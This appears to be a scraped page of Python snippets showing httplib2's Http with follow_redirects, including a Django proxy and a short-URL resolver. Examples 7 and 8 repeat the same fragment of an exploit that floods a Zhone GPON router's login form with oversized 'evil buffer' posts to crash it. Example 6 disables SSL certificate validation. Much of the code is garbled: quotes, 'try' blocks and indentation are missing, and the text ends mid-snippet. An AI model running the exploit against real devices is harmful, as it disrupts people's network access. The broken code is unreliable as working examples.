Example #1
def proxy(request):
    """Pass an HTTP request on to another server."""

    # TODO: don't hardcode http
    uri = "http://" + HOST + request.META['PATH_INFO']
    if request.META['QUERY_STRING']:
        uri += '?' + request.META['QUERY_STRING']

    headers = {}
    for name, val in six.iteritems(request.environ):
        if name.startswith('HTTP_'):
            name = header_name(name)
            headers[name] = val

    # TODO: try/except
    http = Http()
    http.follow_redirects = False
    logger.debug("GET for: %s" % uri)
    info, content = http.request(uri, 'GET', headers=headers)
    response = HttpResponse(content, status=info.pop('status'))

    for name, val in info.items():
        if not is_hop_by_hop(name):
            response[name] = val
    logger.info("PROXY to: %s" % uri)
    return response
Example #2
 def can_read(self, user):
     #make a http request to url as user.
     cookie = make_cookie(user.username)
     headers = dict(Cookie = "%s=%s" % cookie)
     http = Http() #fixme: globalize this so I can use keepalive
     http.follow_redirects = True
     response, content = http.request(self.url, headers=headers)
     return response.status == 200
 def ShortToFull(self):
     request = Http()    # create http object
     request.follow_redirects = False
     response, contents = request.request(self.shorturl) #shorturl request and get fullurl from response
         if response.status == 404:  # status 404 is link break
             self.fullurl = "N/A"
         self.fullurl = response['location']
     except KeyError as err:
         return 0
     return 1
Example #4
def get_http():
    Get an http object

    This is just an instance of the httplib2.Http class, properly
    customized, extended and configured.

    Note in most cases, handlers and other code should use the
    get_http method of a MobileSite instance, rather than using this
    function directly, in case the desktop source of a particular
    mobile site needs further customization.

    @return : http object
    @rtype  : httplib2.Http
    from httplib2 import Http
    http = Http()
    http.follow_redirects = False
    http.force_exception_to_status_code = True
    return http
def proxy(request):

    # TODO: don't hardcode http
    uri = "http://" + HOST + request.META['PATH_INFO']
    if request.META['QUERY_STRING']:
        uri += '?' + request.META['QUERY_STRING']

    headers = {}
    for name, val in request.environ.iteritems():
        if name.startswith('HTTP_'):
            name = header_name(name)
            headers[name] = val

    # TODO: try/except
    http = Http()
    http.follow_redirects = False
    info, content = http.request(uri, 'GET', headers=headers)
    response = HttpResponse(content, status=info.pop('status'))

    for name, val in info.items():
        if not is_hop_by_hop(name):
            response[name] = val

    return response
Example #6
 def http(self):
     http = Http(cache=self.cache, timeout=5, disable_ssl_certificate_validation=True)
     http.follow_redirects = self.chase_redirect
     return http
Example #7
                print '          GPON Zhone 2520'
                print '          Hardware: 0040-48-02'
                print '          Software: R4.0.2.566b'
                print '                                 '
                print ' Usage : python', sys.argv[0] + ' <ip>'
                print ' Ex :    python',sys.argv[0] + ''
                print ' Author : Kaczinski [email protected] '
                print ' URL : http://www.websec.mx/advisories'
                print '*********************************************************************************'

HOST = sys.argv[1]
LIMIT = 100000
SIZE = 10

while len(BUFFER) < LIMIT:
        BUFFER = '\x41' * COUNT
        print "[+] Sending evil buffer with length:", len(BUFFER)
        h = Http()
        h.follow_redirects = True
        data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
                resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
                print "[+] GPON should be down, is not responding..."
        COUNT = COUNT * SIZE

print "[-] GPON not vulnerable"
Example #8
                print '          Hardware: 0040-48-02'
                print '          Software: R4.0.2.566b'
                print '                                 '
                print ' Usage : python', sys.argv[0] + ' <ip>'
                print ' Ex :    python',sys.argv[0] + ''
                print ' Author : Kaczinski [email protected] '
                print ' URL : http://www.websec.mx/advisories'
                print '*********************************************************************************'

HOST = sys.argv[1]
LIMIT = 100000
SIZE = 10

while len(BUFFER) < LIMIT:
        BUFFER = '\x41' * COUNT
        print "[+] Sending evil buffer with length:", len(BUFFER)
        h = Http()
        h.follow_redirects = True
        data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
                resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
                print "[+] GPON should be down, is not responding..."
        COUNT = COUNT * SIZE

print "[-] GPON not vulnerable"
 def http_request(url, method, data=None, headers=None):
     h = Http()
     h.follow_redirects = False
     return h.request(url, method, data, headers)
 def http_request(url, method, data=None, headers=None):
     h = Http()
     h.follow_redirects = False
     return h.request(url, method, data, headers)
Example #11
# -*- Encoding: utf-8 -*-
import urllib
from httplib2 import Http

LOGIN_URL = 'http://www.renren.com/PLogin.do'
FRIENDS_URL = 'http://friend.renren.com/myfriendlistx.do'

h = Http()
h.follow_redirects = False

login_data = {
    'email': '*****@*****.**',
    'password': '******',
    'origURL': 'http://www.renren.com/home',
    'domain': 'renren.com',

headers_template = {